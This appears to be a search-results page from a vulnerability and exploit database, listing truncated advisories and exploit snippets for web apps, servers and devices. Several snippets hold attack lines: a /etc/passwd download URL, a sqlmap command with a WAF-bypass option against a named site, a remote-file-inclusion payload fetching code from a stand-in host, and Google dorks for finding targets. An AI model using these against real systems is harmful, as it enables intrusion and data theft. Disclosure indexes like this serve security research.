56796 matches found
phpoa upLoadOfficeFile.php 任意文件上传漏洞
No description provided by source...
多个产品BMP拒绝服务漏洞
ACDSee, IrfranView和FastStone image viewer是图片管理处理程序。 ACDSee, IrfranView和FastStone image viewer处理畸形BMP文件存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 FastStone Image Viewer 2.9 目前没有解决方案提供: http://www.irfanview.com/ http://www.acdsee.com...
YaPIG 0.95b Remote Code Execution Exploit
No description provided by source. ?php / This module adds a comment file in $giddir . $gid . "" .$phid file Each File will have this format if $SEPARATOR=":"; title:author:date:email:web:message\n if a message contains "\n" character, it will be replaced with "br /" The variables receives by the...
Mambo AkoComment Module mosConfig_absolute_path远程文件包含漏洞
Mambo AkoComment是一款基于PHP的WEB应用程序。 Mambo AkoComment不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'akocomments.php'脚本对用户提交的'mosConfigabsolutepath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Arthur Konze WebDesign AkoComment 1.1 http://www.konze.de/...
Dr.COM DrcomManager 任意文件下载漏洞
No description provided by source...
Microsoft IIS FTPd服务NLST命令远程栈溢出漏洞
BUGTRAQ ID: 36189 CVECAN ID: CVE-2009-3023 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 Microsoft IIS内嵌的FTP服务器中存在栈溢出漏洞。如果远程攻击者对带有特制名称的目录发布了包含有通配符的FTP NLST(NAME LIST)命令的话,就可以触发这个溢出,导致执行任意代码。仅在攻击者拥有写访问权限的情况下才可以创建带有特殊名称的目录。 Microsoft IIS 6.0 Microsoft IIS 5.0 厂商补丁: Microso...
JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit
No description provided by source. JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit SQL Injection Code input name="author" type="text" value="UniquE-Key'UNION SELECT...
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
No description provided by source. S-G鋝tebuch //'=============================================================================================== //'Script Name: S-G鋝tebuch //'Dork Ex. : http://www.google.com.tr/search?q=VS-G%C3%A4stebuch+V.+%C2%A9&hl=tr&start=10&sa=N //'S.Page :...
Downline Goldmine paidversion (tr.php id) - SQL Injection Vulnerability
No description provided by source. paidversion tr.php id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.downlinegoldmine.com/ DorK : inurl:tr.php?id= Exploit :...
PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability
No description provided by source. -------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo...
MediaWiki远程代码执行漏洞
CVE ID:CVE-2014-1610 MediaWiki是美国维基媒体(Wikimedia)基金会和MediaWiki志愿者共同开发维护的一套自由免费的基于网络的Wiki引擎,它可用于部署内部的知识管理和内容管理系统。 MediaWiki中存在输入验证漏洞,该漏洞源于thumb.php脚本没有正确过滤‘page’参数。当启用支持上传DjVu或PDF文件时,远程攻击者可借助特制的shell元字符利用该漏洞执行任意命令。以下版本受到影响:MediaWiki 1.22.2之前的1.22.x版本,1.21.5之前的1.21.x版本,1.19.11之前的1.19.x版本。 0 MediaWik...
Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability
No description provided by source. =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo comserverstat Component =0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish...
Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support
No description provided by source. / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted...
大汉版通JCMS内容管理系统任意文件下载漏洞
简要描述: 多处任意文件下载,影响版本未知,大概都影响吧。 详细说明: 1. http://target/jcms/m59/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt 要得到网站路径,访问:http://target/jcms/m59/sendreport/,然后生成报表就看得到了。 2...
ueditor 1.2.2.0 fileUp.jsp 文件上传漏洞
No description provided by source...
PHPCodeGenie Core.PHP远程文件包含漏洞
PHPCodeGenie是一款基于PHP的内容管理程序。 PHPCodeGenie不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'core.php'脚本对用户提交的'BeautPath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 phpCodeGenie phpCodeGenie 3.0.2 http://sourceforge.net/projects/phpcodegenie/...
Joomla 1.5 - 3.4 版本远程命令执行漏洞
使用编写好的脚本对其进行发包(注入恶意 User-Agent 存储进入数据库 Session Data ): 其中 User-Agent 为:...
OpenSSL 'EVP_VerifyFinal'函数签名验证漏洞
BUGTRAQ ID: 33150 CVE ID:CVE-2008-5077 CNCVE ID:CNCVE-20085077 OpenSSL是一款开放源码的SSL实现,用来实现网络通信的高强度加密。 部分OpenSSL函数验证DSA和ECDSA密钥时不正确验证"EVPVerifyFinal"函数返回值,发送特殊构建的签名证书链给客户端,可绕过签名检查。 通过恶意服务器或中间人攻击,可使证书链中的畸形SSL/TLS签名绕过客户端软件检查,导致盲目信任并泄漏敏感信息。 成功利用此漏洞需要服务器使用包含DSA或者ECDSA密钥的证书。 Ubuntu Ubuntu Linux 8.10 spar...
Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit
No description provided by source. !-- Toshiba Surveillance Surveillix RecordSend Class MeIpCamX.DLL 1.0.0.4 remote buffer overflow exploit IE7/xpsp2 a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.c...
xiuno bbs xss漏洞
Xiuno BBS 4.0.0 后台xss 漏洞 1、什么是 Xiuno BBS 4.0? 它是一款国产、小巧、稳定、支持在大数据量下仍然保持高负载能力的轻论坛。它只有 20 多个表,源代码压缩后 1M 左右,运行速度非常快,处理单次请求在 0.01 秒级别,在有 APC、Yac、XCache 的环境下可以跑到 0.00x 秒,对第三方类库依赖少,作者认为它就像一辆纯手工打造的法拉利,动力强劲,没有一丝赘肉,方便部署和维护,是一个非常好的二次开发的基石。 2,漏洞详情 Xiuno BBS 4.0.0 后台 设置-基本设置- 站点名称 过滤不严 存在xss漏洞。 站点名称处输入xss...
initroot: Bypassing Nexus 6 Secure Boot through Kernel Command-line Injection
In the May 2017 Android Security Bulletin, Google released a patch to a critical and unique vulnerability CVE-2016-10277 in the Nexus 6 bootloader we had found and responsibly disclosed. By exploiting the vulnerability, a physical adversary or one with authorized-ADB/fastboot USB access to the...
TLS Renegotiation Vulnerability PoC
No description provided by source. !/usr/bin/env python RedTeam Pentesting GmbH [email protected] http://www.redteam-pentesting.de PoC exploit for the TLS renegotiation vulnerability CVE-2009-3555 License ------- CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ Timeline -------...
Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit
No description provided by source. ypk.c: /update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED SunOS 4.1.3/RPC SERVICES ...
Linux kernel 'udp. c' remote code execution vulnerability(CVE-2016-10229)
The Linux kernel allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSGPEEK flag. This may create a kernel panic or memory corruption leading to privilege escalation...
青果教务系统 /xsweb/pub/temp.aspx nj参数SQL注入漏洞
存在漏洞的文件:/xsweb/pub/temp.aspx?type=ajax&fellowXh=wooyun 该系统有waf的防御,只需要使用--tamper参数即可绕过,继续注入 sqlmap.py -u "http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun" --tamper "equaltolike.py" --dbms mssql...
WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability
No description provided by source. ----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote...
Joomla extended_registration组件远程文件包含漏洞
extendedregistration是Mambo(也被称为Joomla)中提供扩展注册支持的组件。 extendedregistration组件在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 extendedregistration组件没有正确地验证mosConfigabsolutepath参数数据的输入,允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。admin.extendedregistration.php文件中漏洞代码如下: ?php require"../configuration.php"; functi...
用友GRP-U8 财务管理软件userInfoWeb接口敏感信息泄露漏洞
No description provided by source...
TurboMail 前台sql注入漏洞
简要描述: 前台注入存在注入,可查看管理员密码甚至getshell。 详细说明: 0x1 前台注入 turbomail\web\webapps\ROOT\enterprise\noteadd.jsp: ... UserInfo userinfo = ms.userinfo; if userinfo == null XInfo.gotoInfoms,request,response,"info.loginfail",null,0; return; String id = request.getParameter"id";//id参数传入,没有过滤 Note note = null;...
Oracle (oidldapd connect) Local Command Line Overflow Exploit
No description provided by source. / Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd...
用友oa /yyoa/checkWaitdo.jsp 注入漏洞
No description provided by source...
Microsoft Windows Internet打印服务整数溢出漏洞(MS08-062)
BUGTRAQ ID: 31682 CVECAN ID: CVE-2008-1446 Microsoft Windows是微软发布的非常流行的操作系统。 IIS的Internet打印协议ISAPI扩展在处理特制的IPP响应时存在整数溢出漏洞。如果Windows系统上在运行IIS且启用了Internet打印服务的话,远程攻击者可以通过特制的HTTP POST请求诱骗受影响的服务器连接到恶意的IPP服务器来触发这个溢出,导致执行任意指令。 Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP1...
DedeCMS 5.7 SP1 /install/index.php 远程文件包含漏洞
1.漏洞分析 /install/index.php.bak or index.php php $slang = 'utf-8'; $installdemoname = 'dedev57demo.txt'; $insLockfile = dirnameFILE.'/installlock.txt'; //初始化了变量 $moduleCacheFile = dirnameFILE.'/modules.tmp.inc';//初始化了变量 .... 29行 foreachArray'GET','POST','COOKIE' as $request foreach$$request as $k =...
Novell eDirectory 8.8 Long URI iMonitor Buffer Overflow Exploit (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...
Selenium Server 未授权访问漏洞
1.开篇 不知道大家在平日工作中有没有遇到过一些端口,使用浏览器打开是下面这样子的: 上图中我找了几个在不同端口下的例子。 2.Selenium-开源的自动化测试利器 本篇主要的主角-Selenium究竟是什么呢?有过QA经验或安全自动化测试经验的朋友应该知道,以下文字来自百度百科:Selenium1 是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括IE(7, 8, 9, 10, 11),Mozilla Firefox,Safari,Google Chrome,Opera等。支持自动录制动作和自动生成...
beescms4.0 一处任意文件上传漏洞#3
No description provided by source...
"Huge Dirty COW" (CVE-2017–1000405)
The “Dirty COW” vulnerability CVE-2016–5195 is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast — millions of users could be compromised easily and reliably, bypassing...
Multiple Vulnerabilities in TP-Link TL-SG108E(CVE-2017-17745, CVE-2017-17746, CVE-2017-17747)
Overview Three vulnerabilities have been discovered in the TP-Link TL-SG108E, firmware 1.0.0 Build 20160722 Rel.50167: CVE-2017-17745 - Cross Site Scripting XSS in systemnameset.cgi, sysName parameter CVE-2017-17746 - Weak access control for user authentication CVE-2017-17747 - Weak access contro...
Dnsmasq Heap based overflow(CVE-2017-14492)
1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasqtest dnsmasq bash docker cp poc.py dnsmasqtest:/poc.py docker exec -it bash 2 On one terminal start dnsmasq: /test/dnsmasqnoasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra...
ProFTPD mod_tls模块CA SSL证书验证漏洞
BUGTRAQ ID: 36804 CVE ID: CVE-2009-3639 ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的modtls模块没有正确地处理X.509证书主题通用名称(CN)字段域名中的空字符(\0),在处理包含有空字符的证书字段时错误地将空字符处理为截止字符,因此只会验证空字符前的部分。例如,对于类似于以下的名称: example.com\0.haxx.se 证书是发布给haxx.se的,但modtls模块错误的验证给example.com,这有助于攻击者通过中间人攻击执行网络钓鱼等欺骗。 必须满足以下modtls配置的情况下服务器才受这个漏洞影响:...
Softbiz Auktios Script Multiple SQL Injection Vulnerabilities
No description provided by source. ----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection viewitems.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.co...
Apache HTTP Server mod_proxy反向代理模式安全限制绕过漏洞
BUGTRAQ ID: 50802 CVE ID: CVE-2011-4317 Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器,可以在大多数电脑操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 Apache HTTP Server在反向代理模式中配置modproxy模块时错误地处理了某些Web请求,可通过特制的URL向代理后方的服务器发送请求,从而绕过某些安全限制。 Apache 2.2.x Apache 2.0.x 厂商补丁: Apache Group ------------...
Coppermine Photo Gallery变量内容重写漏洞
Coppermine是用PHP编写的多用途集成Web图形库脚本。 Coppermine Photo Gallery处理用户请求数据时存在漏洞,远程攻击者可能利用此漏洞上传PHP脚本文件从而控制应用系统。 系统的include/init.inc.php脚本在过滤处理全局变量时存在问题,远程攻击者可以据此绕过安全限制上传任意脚本文件实现命令执行。要利用此漏洞需要系统的PHP打开registerglobals选项。 Coppermine Photo Gallery 1.x Coppermine Photo Gallery 临时解决方法:...
Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881)
详情来源:https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Do you still have telnet enabled on your Catalyst switches? Think twice, here’s a proof-of-concept remote code execution exploit for Catalyst 2960 switch with latest suggested firmware. Check out the exploit code here. What...
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: Powered By Aardvark Topsites PHP 4.2.2 Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-...
Microsoft Outlook Web Access for Exchange Server 2003 'redir.asp' URI Redirection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31765/info Outlook Web Access is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks. OWA 6.5 SP 2 is...
mozilla-thunderbird多个安全漏洞
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2009:217-1 http://www.mandriva.com/security/ Package : mozilla-thunderbird Date : August 23, 2009 Affected: 2009.1 Problem Description: A number of security vulnerabilities have...
ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability
No description provided by source. ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M ...
AVTECH {DVR/NVR/IPC} IPCP API RCE
!/usr/bin/env python2.7 SOF Subject: AVTECH DVR/NVR/IPC IPCP API admin l/p, RCE 2018 bashis Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis March 2018 Authenticated Reverse Shell; Using admin l/p that we can retrieve with unauthenticated and undocumented...
Cisco ASA Remote Code Execution (CVE-2016-1287)
Remote Code Execution on Cisco ASA A year ago ExodusIntel disclosed a vulnerability affecting the IKE implementation in Cisco’s ASA products. The error is due to an overflow in the checking of reassembled IKE fragments, and allows remote code execution from an unauthenticated attacker. More...